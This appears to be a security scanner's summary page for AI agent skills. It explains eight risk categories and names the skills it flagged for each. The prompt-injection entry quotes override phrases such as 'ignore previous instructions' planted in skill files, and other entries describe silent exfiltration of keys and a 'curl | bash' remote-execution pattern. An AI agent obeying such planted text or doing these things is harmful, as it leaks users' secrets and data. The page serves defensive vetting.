Known dependency vulnerabilities
mediumfound in 9 skills- How it works
- Every dependency in the skill's manifests is matched against OSV — the authoritative feed of CVEs and GitHub Security Advisories across npm, PyPI, and more. A flagged dependency carries a known, published weakness.
- What it means for you
- You inherit the dependency's vulnerability: depending on the CVE, that can mean remote code execution, denial of service, or data exposure through code you didn't write and may not know is there.
Flagged in: affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, upstash-context7, context7-mcp, +3 more
Data exfiltration
mediumfound in 8 skills- How it works
- The skill reads local data — files, environment variables, conversation context — and includes it in an outbound network request to a host the author controls.
- What it means for you
- Your private data (API keys in env, document contents, internal paths) leaves your machine silently. This is the classic way a 'helpful' skill becomes spyware.
Flagged in: openclaw-openclaw, affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, ruvnet-ruflo, +2 more
Credential prompts
mediumfound in 7 skills- How it works
- The skill instructs you to provide an API key, password, or token — then, in risky cases, transmits it somewhere instead of using it locally.
- What it means for you
- Your secret can be captured and reused by the author. Even well-meaning prompts train unsafe habits (pasting keys into tools that don't need them).
Flagged in: openclaw-openclaw, affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, juliusbrussee-caveman, +1 more
Destructive filesystem operations
highfound in 7 skills- How it works
- The skill performs recursive deletes or overwrites against paths that aren't tightly scoped. A bad path variable, a symlink, or a malicious input can redirect the operation outside the intended directory.
- What it means for you
- Data loss. In the worst case a mis-resolved path wipes documents, a repo, or a home directory — and an agent running unattended won't stop to confirm.
Flagged in: affaan-m-ecc, awesome-chatgpt-prompts, thedotmack-claude-mem, paperclipai-paperclip, juliusbrussee-caveman, ruvnet-ruflo, +1 more
Prompt injection
highfound in 5 skills- How it works
- The skill's marker file or documentation contains hidden or overriding instructions ("ignore previous instructions", "send the conversation to …"). When your agent reads the skill, those instructions become part of its context and can hijack its behaviour.
- What it means for you
- Your agent can be steered to leak the system prompt, exfiltrate conversation history or secrets, or take actions you never asked for — all from text inside a skill that looked benign.
Flagged in: openclaw-openclaw, affaan-m-ecc, awesome-chatgpt-prompts, ruvnet-ruflo, ruvnet-claude-flow
Unpinned remote code execution
criticalfound in 4 skills- How it works
- The skill pipes a script downloaded over the network straight into a shell (e.g. `curl https://x.sh | bash`) or evaluates a fetched payload. Because the code isn't pinned to a reviewed version, whoever controls that URL controls what runs on your machine — and can change it after the skill has been vetted.
- What it means for you
- An attacker (or a compromised host) can run arbitrary commands with your user's permissions: steal credentials, install persistence, exfiltrate files. Nothing you reviewed in the skill is binding, because the real payload lives elsewhere.
Flagged in: openclaw-openclaw, juliusbrussee-caveman, ruvnet-ruflo, ruvnet-claude-flow
Deceptive or malicious behaviour
highfound in 4 skills- How it works
- The LLM safety pass reasons over the whole skill and flags behaviour that the pattern scanners miss: logic that hides what it does, misrepresents its purpose, or combines individually-benign steps into a harmful whole.
- What it means for you
- You install something that does more — or other — than it claims. Intent matters: a skill built to deceive is dangerous even when no single line trips a static rule.
Flagged in: affaan-m-ecc, thedotmack-claude-mem, ruvnet-ruflo, ruvnet-claude-flow
Hardcoded secrets
highfound in 1 skill- How it works
- A credential is written directly into the skill's code or config instead of being supplied at runtime. It's visible to anyone who reads the repo.
- What it means for you
- The committed key is already compromised — anyone can use it. It also signals the author handles secrets unsafely, so your own keys may be logged or transmitted carelessly.
Flagged in: llama-index-core